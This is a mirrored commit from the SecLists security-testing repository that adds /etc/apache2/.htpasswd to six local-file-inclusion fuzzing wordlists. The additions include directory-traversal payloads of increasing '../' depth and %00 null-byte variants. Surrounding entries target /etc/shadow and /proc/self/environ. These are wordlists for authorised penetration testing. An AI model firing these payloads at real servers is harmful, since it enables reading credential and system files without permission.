mirror of
https://github.com/danielmiessler/SecLists
synced 2025-12-06 00:43:40 +01:00
feat(wordlist): Added /etc/apache2/.htpasswd to LFI fuzzing lists (PR #1223)
This commit is contained in:
parent
a23e174bc7
commit
122cc78a22
6 changed files with 44 additions and 1 deletions
|
|
@ -118,6 +118,7 @@ db.php
|
|||
../../../../../../../dev
|
||||
/D:\Program Files\
|
||||
d:\System32\Inetsrv\metabase.xml
|
||||
/etc/apache2/.htpasswd
|
||||
/etc/apache2/apache2.conf
|
||||
/etc/apache2/conf/httpd.conf
|
||||
/etc/apache2/httpd.conf
|
||||
|
|
|
|||
|
|
@ -4009,6 +4009,44 @@ proc/self/environ%00%00
|
|||
../../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00
|
||||
../../../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00
|
||||
../../../../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00
|
||||
/etc/apache2/.htpasswd
|
||||
../etc/apache2/.htpasswd
|
||||
../../etc/apache2/.htpasswd
|
||||
../../../etc/apache2/.htpasswd
|
||||
../../../../etc/apache2/.htpasswd
|
||||
../../../../../etc/apache2/.htpasswd
|
||||
../../../../../../etc/apache2/.htpasswd
|
||||
../../../../../../../etc/apache2/.htpasswd
|
||||
../../../../../../../../etc/apache2/.htpasswd
|
||||
../../../../../../../../../etc/apache2/.htpasswd
|
||||
../../../../../../../../../../etc/apache2/.htpasswd
|
||||
../../../../../../../../../../../etc/apache2/.htpasswd
|
||||
../../../../../../../../../../../../etc/apache2/.htpasswd
|
||||
../../../../../../../../../../../../../etc/apache2/.htpasswd
|
||||
../../../../../../../../../../../../../../etc/apache2/.htpasswd
|
||||
../../../../../../../../../../../../../../../etc/apache2/.htpasswd
|
||||
../../../../../../../../../../../../../../../../etc/apache2/.htpasswd
|
||||
../../../../../../../../../../../../../../../../../etc/apache2/.htpasswd
|
||||
../../../../../../../../../../../../../../../../../../etc/apache2/.htpasswd
|
||||
/etc/apache2/.htpasswd%00
|
||||
../etc/apache2/.htpasswd%00
|
||||
../../etc/apache2/.htpasswd%00
|
||||
../../../etc/apache2/.htpasswd%00
|
||||
../../../../etc/apache2/.htpasswd%00
|
||||
../../../../../etc/apache2/.htpasswd%00
|
||||
../../../../../../etc/apache2/.htpasswd%00
|
||||
../../../../../../../etc/apache2/.htpasswd%00
|
||||
../../../../../../../../etc/apache2/.htpasswd%00
|
||||
../../../../../../../../../etc/apache2/.htpasswd%00
|
||||
../../../../../../../../../../etc/apache2/.htpasswd%00
|
||||
../../../../../../../../../../../etc/apache2/.htpasswd%00
|
||||
../../../../../../../../../../../../etc/apache2/.htpasswd%00
|
||||
../../../../../../../../../../../../../etc/apache2/.htpasswd%00
|
||||
../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
|
||||
../../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
|
||||
../../../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
|
||||
../../../../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
|
||||
../../../../../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
|
||||
/etc/apache2/httpd.conf
|
||||
../etc/apache2/httpd.conf
|
||||
../../etc/apache2/httpd.conf
|
||||
|
|
@ -9510,4 +9548,4 @@ d:/boot.ini
|
|||
D:/XAMPP/logs/access.log
|
||||
d:/XAMPP/logs/access.log
|
||||
D:\XAMPP\logs\access.log
|
||||
d:\XAMPP\logs\access.log
|
||||
d:\XAMPP\logs\access.log
|
||||
|
|
@ -209,6 +209,7 @@ proc/self/environ%00
|
|||
/etc/httpd/conf/httpd.conf
|
||||
/etc/apache/conf/httpd.conf
|
||||
/usr/local/etc/apache/conf/httpd.conf
|
||||
/etc/apache2/.htpasswd
|
||||
/etc/apache2/httpd.conf
|
||||
/usr/local/apache/httpd.conf
|
||||
/usr/local/apache2/httpd.conf
|
||||
|
|
|
|||
|
|
@ -191,6 +191,7 @@
|
|||
/etc/apache/ssl.prm/README
|
||||
/etc/apache/ssl.prm/snakeoil-ca-dsa.prm
|
||||
/etc/apache/ssl.prm/snakeoil-dsa.prm
|
||||
/etc/apache2/.htpasswd
|
||||
/etc/apache2/apache2.conf
|
||||
/etc/apache2/conf-available/gitweb.conf
|
||||
/etc/apache2/conf.d/apache2-doc
|
||||
|
|
|
|||
|
|
@ -2,6 +2,7 @@
|
|||
/etc/shadow
|
||||
/etc/aliases
|
||||
/etc/anacrontab
|
||||
/etc/apache2/.htpasswd
|
||||
/etc/apache2/apache2.conf
|
||||
/etc/apache2/httpd.conf
|
||||
/etc/at.allow
|
||||
|
|
|
|||
|
|
@ -26,6 +26,7 @@
|
|||
/etc/apache/httpd.conf
|
||||
/etc/apache2.conf
|
||||
/etc/apache2.conf
|
||||
/etc/apache2/.htpasswd
|
||||
/etc/apache2/apache2.conf
|
||||
/etc/apache2/apache2.conf
|
||||
/etc/apache2/conf/httpd.conf
|
||||
|
|
|
|||
Loading…
Reference in a new issue